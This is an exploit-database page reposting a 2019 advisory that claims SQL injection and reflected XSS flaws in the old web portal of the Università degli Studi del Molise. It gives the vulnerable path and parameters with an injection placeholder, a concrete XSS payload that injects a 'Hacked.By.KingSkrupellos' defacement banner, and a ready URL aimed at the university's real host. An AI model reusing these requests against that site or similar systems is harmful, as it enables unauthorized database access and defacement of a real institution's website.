Advertisement






OldWeb Universite Degli Studi Del Molise Italy XSS SQL Injection

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-12-11
CPE
cpe:cpe:/a:oldweb:universite-degli-studi-del-molise-italy
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.90134

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120049

Below is a copy:

OldWeb Universite Degli Studi Del Molise Italy XSS SQL Injection
###################################################################

# Exploit Title : OldWeb Universite Degli Studi Del Molise Italy XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/12/2019
# Vendor Homepage : oldweb.unimol.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
OldWeb Universite Degli Studi Del Molise Italy is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using 
it in an SQL query. Exploiting this issue could allow an attacker to compromise the 
application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response. 
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
 to a vulnerable web application, which is then reflected back to the victim and executed by the 
web browser. The most common mechanism for delivering malicious content is to include 
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. 
URLs constructed in this manner constitute the core of many phishing schemes, whereby 
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects 
the attacker's content back to the victim,the content is executed by the victim's browser.

###################################################################

# SQL Injection Exploit :
**********************
/pls/unimolise/v3_s2ew_consultazione.mostra_paginat0?id_pagina=
[SQL Injection]&limite_id_sezione=[ID-NUMBER]&limite_id_sito=
[ID-NUMBER]&target=[ID-NUMBER]&rifi=&rifp=

# Cross Site Scripting XSS Exploit :
********************************
/pls/unimolise/v3_s2ew_consultazione.mostra_paginat0?id_pagina=1%27<marquee>
<font%20color=lime%20size=32>Hacked.By.KingSkrupellos</font></marquee>
&limite_id_sezione=0&limite_id_sito=0&target=0&rifi=&rifp=

###################################################################

# Example Vulnerable Sites :
*************************
[+] oldweb.unimol.it/pls/unimolise/v3_s2ew_consultazione.mostra_paginat0?id_pagina=
1%27&limite_id_sezione=0&limite_id_sito=0&target=0&rifi=&rifp=

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.